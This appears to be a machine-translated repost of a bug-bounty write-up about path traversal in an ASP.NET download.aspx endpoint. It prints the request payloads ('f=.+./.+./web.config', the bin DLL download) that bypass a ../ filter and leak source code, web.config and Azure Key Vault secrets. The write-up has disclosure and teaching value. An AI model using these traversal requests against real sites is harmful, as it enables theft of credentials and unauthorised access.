Analysis of ASP.NET Application leak Reading 04/04 Update SLTechnology News&Howtos

Analysis of ASP.NET Application leak Reading

2025-04-04 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article mainly explains "ASP.NET application leak read analysis," interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let Xiaobian take you to learn "ASP.NET application leak reading analysis"!

Identify vulnerability points

During a recent dig, I came across this url

https://domain.com/utility/download.aspx? f=DJ/lc1jVgHTZF...

The first thought was to try downloading any file, and after accessing it, when the page loads, it downloads help documentation from another path on the server. But it's encrypted, so I can't tamper with f. Assuming I can find the key to decrypt the parameter (probably AES encryption), I guess I can try to use the lower LDF.

Fortunately, I found the same download point in the old version of the website, as follows:

https://domain.com/utility/download.aspx? f=file1234.docx

The response was as follows:

HTTP/1.1 200 OKConnection: closeContent-Length: 27363Ïó|uœZ^tÙ¢yÇ¯;! Y,}{ûCƒ³/h>

I immediately changed the parameter to download.aspx and returned the apsx file content.

GET /utility/download.aspx? f=download.aspxHTTP/1.1 200 OKConnection: closeContent-Length: 263

After testing, the aspx file contents can be accessed, but the actual source file aspx.cs cannot be accessed.

The difference between.aspx and.aspx.cs can be found at https://stackoverflow.com/questions/13182757/what-is-the-difference-between-aspx-and-aspx-cs

This problem needs to be solved, otherwise it cannot be used later.

I went on to visit other catalogues and see if I could find anything.

Bypass directory access restrictions

Use regular../ When traversing, it is always found that 400 bad requests are returned, and it is estimated that there is filtering.

Use burp to try fuzz and see if you can bypass it.

You can test it manually, but to save time, fuzz with the following request

GET /utility/download.aspx? f=. [fuzz]./ utility/download.aspx

Looking at the returned content, it was found that the correct content was returned using the character +.

Here I am confused, the use of the local build environment test I use + fuzz failed, roughly guess the plus sign in the url represents a space, perhaps related to the file name of the Window.

further use

Now that the restriction has been circumvented, I tried reading the ashx file, which is a mix of HTML and C#, presumably readable.

Read successfully

HTTP/1.1 200 OKConnection: closeContent-Length: 2398Imports SystemImports System.DataImports System.Data.SqlClientImports System.IOImports System.WebImports System.Configuration...

I had already gotten some sensitive information here, and wanted to take it further, so I decided to read more source code files.

When confused about a technology, it's best to read its official documentation, so reading the ASP.NET application documentation reveals that the compiled classes are reserved in/bin/className.dll. This means that we should be able to extract class names referenced in.ashx files.

I was able to download the DLL (Store DLL https://blogs.msdn.microsoft.com/tom/2008/07/21/asp-net-tips-loading-a-dll-out-of-the-bin-directory/) to the source file by sending the following request

GET /utility/download.aspx? f=.+./.+./ bin/redacted.dll

After downloading, use dnSpy (C#decompiler) to import the DLL and recover the application source code, after which you can download more class files to get the source code.

Azure key breach proves serious impact

Sensitive files in ASP.NET applications are web.config, which is essentially a configuration file containing variables ranging from a single page to an entire Web server. There is a lot of sensitive information in the file, such as SQL database passwords, encryption keys for encrypted parameters like we saw above, and internal interfaces used by the application.

Here is an example web.config file.

After sending the following request, we got the contents of web.config.

GET /utility/download.aspx? f=.+./.+./ web.config

There are many secrets in the response, the most notable of which is the disclosure of the following secrets.

......

These keys provide access to Azure Key Vault instances. Azure Key Vault holds the secrets of applications with sensitive information.

The question now is how do I correctly send requests to access Azure Key Vault instances? After discussing it with his friends shubs, he immediately wrote a Node.js script that successfully accessed Azure Key Vault instances using public keys... haha

The response was as follows:

{ id: 'https://redacted.vault.azure.net/secrets/ftp_credentials', attributes: { enabled: true, created: 2018-01-23T22:14:18.000Z, updated: 2018-01-23T22:14:18.000Z, recoveryLevel: 'Purgeable' }, contentType: 'secret' } ]... more secrets ...

This exploit is complete, and the final secrets obtained are enough for my control system to prove the degree of harm, so I can submit a report.

At this point, I believe that we have a deeper understanding of "ASP.NET application leak read analysis," may wish to actually operate it! Here is the website, more related content can enter the relevant channels for inquiry, pay attention to us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.